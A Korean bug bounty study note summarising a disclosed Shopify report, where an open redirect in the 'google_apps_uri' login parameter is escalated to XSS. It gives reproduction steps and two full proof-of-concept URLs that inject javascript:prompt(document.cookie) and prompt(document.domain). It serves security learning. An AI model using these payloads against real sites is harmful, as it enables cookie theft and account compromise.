[Bugbounty Study] #Shopify _ Open Redirect to XSS

#Shopify XSS _ \$1750

https://medium.com/@ashketchum/how-i-earned-1750-at-shopify-bug-bounty-program-ca7821990d08

How I Earned $1750 at Shopify Bug Bounty Program

Shopify의 your-store.myshopify.com를 살펴보다 설정의 로그인 서비스를 발견하였다.

 

위와 같이 Enable Google Apps for login에 체크하여,

Staff이 구글을 통해 로그인을 시도하면 어떤 방식으로 권한을 주는지 살펴보았다.

 

Log in with Google을 하면 볼 수 있는 "google_apps_uri" 파라미터에서 Open Redirect 취약점이 발생한다.

Open Redirect 취약점만으로는 Accept되지 않기 때문에, 스크립트 문을 삽입하여 XSS 취약점을 발생시켰다.

 

[재현 방법]

1.  https://yourshop.myshopify.com/admin/settings/account 접속
2.  로그인 서비스의 Staff can use Google Apps to log in -> Enable Google Apps for login
3.  PoC Url로 접속하여 Google 로그인 시도

 

[PoC]

https://app.shopify.com/services/login/identity?destination_uuid=79b5c315-b5ac-4b19-bd33-13554433fa31&google_apps_uri=javascript:prompt(document.domain)&return_to=https%253A%252F%252Fapp.shopify.com%252Fservices%252Flogin%252Fidentity_callback%253Fshop_name%253D123ashketchum%2526state%253D6a_2K0iBEBMG3sv07qFMrtzfrBFY4gZ9JsN0EJAW2Xck07xlkghl0tmZwGIvYEZ1KZw2mG4d4Omhl_h5oB_7t4dcXoS37UUOMG6f9sOr7BCKyR23PWbLpVlh4A0lMXmNuxOEUeEA55eapNpVZqT6AyfnJkQhn4K89-I5O6TVqcamtHaXWRH7b1EI6U8LvQFddrBPYniYGpggAwsFLvb5UeTvRw-fbvRditQ20YWYTK8%25253D&ui_locales=en&upgradeable=true&ux=shop
https://app.shopify.com/services/login/identity?destination_uuid=79b5c315-b5ac-4b19-bd33-13554433fa31&google_apps_uri=javascript:prompt(document.cookie)&return_to=https%253A%252F%252Fapp.shopify.com%252Fservices%252Flogin%252Fidentity_callback%253Fshop_name%253D123ashketchum%2526state%253D6a_2K0iBEBMG3sv07qFMrtzfrBFY4gZ9JsN0EJAW2Xck07xlkghl0tmZwGIvYEZ1KZw2mG4d4Omhl_h5oB_7t4dcXoS37UUOMG6f9sOr7BCKyR23PWbLpVlh4A0lMXmNuxOEUeEA55eapNpVZqT6AyfnJkQhn4K89-I5O6TVqcamtHaXWRH7b1EI6U8LvQFddrBPYniYGpggAwsFLvb5UeTvRw-fbvRditQ20YWYTK8%25253D&ui_locales=en&upgradeable=true&ux=shop

 

[취약점 발생 사진]

google_apps_uri=javascript:prompt(document.domain)

 

[PoC Video]

[취약점에서 배울 점]

Reject 되어도 포기하지 말고 취약점으로 연계하자!

 

[Reference]

https://hackerone.com/reports/691611